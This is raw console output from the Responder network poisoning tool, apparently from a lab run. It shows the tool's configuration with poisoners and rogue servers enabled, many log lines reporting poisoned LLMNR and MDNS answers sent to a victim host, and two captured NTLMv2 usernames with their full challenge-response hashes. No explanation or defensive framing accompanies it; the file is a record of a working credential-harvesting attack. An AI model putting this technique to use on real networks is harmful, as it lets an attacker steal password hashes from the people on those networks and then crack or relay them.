                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[1;32m[+] [0mPoisoners:
    LLMNR                      [1;32m[ON][0m
    NBT-NS                     [1;32m[ON][0m
    MDNS                       [1;32m[ON][0m
    DNS                        [1;32m[ON][0m
    DHCP                       [1;31m[OFF][0m

[1;32m[+] [0mServers:
    HTTP server                [1;32m[ON][0m
    HTTPS server               [1;32m[ON][0m
    WPAD proxy                 [1;32m[ON][0m
    Auth proxy                 [1;31m[OFF][0m
    SMB server                 [1;32m[ON][0m
    Kerberos server            [1;32m[ON][0m
    SQL server                 [1;32m[ON][0m
    FTP server                 [1;32m[ON][0m
    IMAP server                [1;32m[ON][0m
    POP3 server                [1;32m[ON][0m
    SMTP server                [1;32m[ON][0m
    DNS server                 [1;32m[ON][0m
    LDAP server                [1;32m[ON][0m
    MQTT server                [1;32m[ON][0m
    RDP server                 [1;32m[ON][0m
    DCE-RPC server             [1;32m[ON][0m
    WinRM server               [1;32m[ON][0m
    SNMP server                [1;32m[ON][0m

[1;32m[+] [0mHTTP Options:
    Always serving EXE         [1;31m[OFF][0m
    Serving EXE                [1;31m[OFF][0m
    Serving HTML               [1;31m[OFF][0m
    Upstream Proxy             [1;31m[OFF][0m

[1;32m[+] [0mPoisoning Options:
    Analyze Mode               [1;31m[OFF][0m
    Force WPAD auth            [1;31m[OFF][0m
    Force Basic Auth           [1;31m[OFF][0m
    Force LM downgrade         [1;31m[OFF][0m
    Force ESS downgrade        [1;31m[OFF][0m

[1;32m[+] [0mGeneric Options:
    Responder NIC              [1;35m[eth2][0m
    Responder IP               [1;35m[192.168.31.244][0m
    Responder IPv6             [1;35m[fe80::473e:7763:17b:9e2][0m
    Challenge set              [1;35m[random][0m
    Don't Respond To Names     [1;35m['ISATAP', 'ISATAP.LOCAL'][0m
    Don't Respond To MDNS TLD  [1;35m['_DOSVC'][0m
    TTL for poisoned response  [1;35m[default][0m

[1;32m[+] [0mCurrent Session Variables:
    Responder Machine Name     [1;35m[WIN-CRCK5QTIP8P][0m
    Responder Domain Name      [1;35m[GXZO.LOCAL][0m
    Responder DCE-RPC Port     [1;35m[47557][0m

[1;32m[*] [0mVersion: Responder 3.1.7.0
[1;32m[*] [0mAuthor: Laurent Gaffie, <lgaffie@secorizon.com>
[1;32m[*] [0mTo sponsor Responder: https://paypal.me/PythonResponder
[1;32m
[+][0m Listening for events...

[1;31m[!] [0mError starting UDP server on port 137, check permissions or other servers running.
[1;31m[!] [0mError starting TCP server on port 445, check permissions or other servers running.
[1;31m[!] [0mError starting TCP server on port 139, check permissions or other servers running.
[1;31m[!] [0mError starting UDP server on port 53, check permissions or other servers running.
[1;31m[!] [0mError starting TCP server on port 53, check permissions or other servers running.
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;34m[HTTP][0m Sending NTLM authentication request to fe80::3b37:c48a:b1e8:c310
[1;34m[WebDAV][0m NTLMv2 Client   : [0;33mfe80::3b37:c48a:b1e8:c310[0m
[1;34m[WebDAV][0m NTLMv2 Username : [0;33mEXPLOITABLE\sibuki[0m
[1;34m[WebDAV][0m NTLMv2 Hash     : [0;33msibuki::EXPLOITABLE:a0a416a66ba13825:852314EED94B90C9D50709DBBB063625:0101000000000000845303DF00ACDC01EBD66881B49035780000000002000800470058005A004F0001001E00570049004E002D004300520043004B00350051005400490050003800500004001400470058005A004F002E004C004F00430041004C0003003400570049004E002D004300520043004B0035005100540049005000380050002E00470058005A004F002E004C004F00430041004C0005001400470058005A004F002E004C004F00430041004C000800300030000000000000000000000000200000C067E47A5A9F8FDDE852018166A3163C40D11C9E50F5C32405063CCCA984E6E70A001000000000000000000000000000000000000900340048005400540050002F0064006F006D00610069006E002D006500780070006C006F006900690074002E006C006F00630061006C000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;34m[HTTP][0m Sending NTLM authentication request to fe80::3b37:c48a:b1e8:c310
[1;34m[WebDAV][0m NTLMv2 Client   : [0;33mfe80::3b37:c48a:b1e8:c310[0m
[1;34m[WebDAV][0m NTLMv2 Username : [0;33mEXPLOITABLE\sibuki[0m
[1;34m[WebDAV][0m NTLMv2 Hash     : [0;33msibuki::EXPLOITABLE:81cff35c5b401072:E39CCE3E34BBB0393C1D66345FC11FC4:0101000000000000C5F86EE400ACDC01AF71FFC566E494CB0000000002000800470058005A004F0001001E00570049004E002D004300520043004B00350051005400490050003800500004001400470058005A004F002E004C004F00430041004C0003003400570049004E002D004300520043004B0035005100540049005000380050002E00470058005A004F002E004C004F00430041004C0005001400470058005A004F002E004C004F00430041004C000800300030000000000000000000000000200000C067E47A5A9F8FDDE852018166A3163C40D11C9E50F5C32405063CCCA984E6E70A001000000000000000000000000000000000000900280048005400540050002F0064006F006D00610069006E002D006500780070006C006F006900690074000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit[0m
